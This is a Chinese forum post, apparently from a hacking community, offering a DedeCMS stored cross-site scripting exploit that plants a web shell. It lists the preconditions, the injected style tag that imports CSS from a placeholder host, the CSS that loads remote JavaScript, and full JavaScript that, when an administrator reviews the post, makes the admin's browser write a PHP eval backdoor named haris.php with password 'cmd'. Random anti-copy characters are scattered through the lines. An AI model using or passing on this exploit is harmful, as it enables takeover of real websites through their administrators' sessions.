找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1850|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
& N4 w3 E/ l4 S+ n3 T" v; J为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)/ ^. Q/ ^1 ?2 s$ l
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
, Q  Y$ F' r6 v  r0 d$ W9 P7 S下面说说利用方法。* {2 j# y; Y6 V& ?
条件有2个:) o  @$ G0 ?3 N" b. W3 a  P  J
1.开启注册
( M, e; w3 P  U) V2 D5 [2.开启投稿
* p0 M2 _0 a: Q' E9 W7 j注册会员----发表文章
2 i2 \& B' O3 W+ L内容填写:" W9 _0 M9 {$ |. ]1 }! Y$ J
复制代码$ h5 i& f( ]5 b% F9 m
<style>@im\port'\http://xxx.com/xss.css';</style>! s) B" |/ g6 P7 H  I1 l- |
新建XSS.Css/ O0 t$ |0 d  h' j7 d! O( n2 p
复制代码! g5 b0 C& Z0 Q; V+ n
.body{
) T$ x' o3 }0 C" }6 O- j- Hbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
% u1 ], q4 s+ @- J, M新建xss.js 内容为
% k2 V5 `" ]/ J# v# Z/ u, T复制代码
7 s" z- ^: s% D: W( H1.var request = false;1 d! F+ M$ P) z2 ^- \, v
2.if(window.XMLHttpRequest) {, p( j, b+ E8 |
3.request = new XMLHttpRequest();! v7 G1 N# _# v6 O, }8 d; U
4.if(request.overrideMimeType) {. Z6 ?' P7 }3 g' z; f; h
5.request.overrideMimeType('text/xml');; Z- e# Z# C! x2 }, k
6.}
8 \8 ~! J' t1 I* x% M  p3 F5 ?7.} else if(window.ActiveXObject) {
, Y, L* A, s0 [$ ^3 I8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
/ j0 j- L0 ~' }0 c9.for(var i=0; i<versions.length; i++) {
3 ?% J/ Y% z6 J# x5 k10.try {
0 n+ X" y, B6 h* R! b11.request = new ActiveXObject(versions);
6 i" _9 F! c/ m" A* Z12.} catch(e) {}
& L' O9 B' I0 j13.}
* b0 T- n. n" {14.}
' E( n# r9 o8 ^. F( m, a5 a0 C15.xmlhttp=request;. m* ?9 m$ w5 d/ G, F/ D
16.function getFolder( url ){9 C: r8 S0 w2 ]6 e1 K8 M! ]
17. obj = url.split('/')! f: C% \) i' C* x: i2 [9 l1 N
18. return obj[obj.length-2]* b( `0 C3 H8 x6 }% R2 o, t8 r' T
19.}! }! [3 i4 U4 h( g% i
20.oUrl = top.location.href;( C0 [5 ]  b' g
21.u = getFolder(oUrl);
9 Q1 w0 w+ o" B6 i7 t+ T, r22.add_admin();9 W* m/ o6 {4 P
23.function add_admin(){( D* i1 K6 h3 ?4 v1 B! r
24.var url= "/"+u+"/sys_sql_query.php";  V2 E# U+ h# {2 y6 }3 t
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";+ q  l; S  w1 D: L. ^
26.xmlhttp.open("POST", url, true);7 `2 c) R3 B3 S1 C
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
8 m& y5 c: @; H2 O' B28.xmlhttp.setRequestHeader("Content-length", params.length);
- |, Y/ A! I' h# j29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");. A! q0 G( g1 @- b9 u7 @
30.xmlhttp.send(params);! @, t+ D3 H3 ^7 z8 ]% H
31.}$ l2 D9 g+ M' J
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表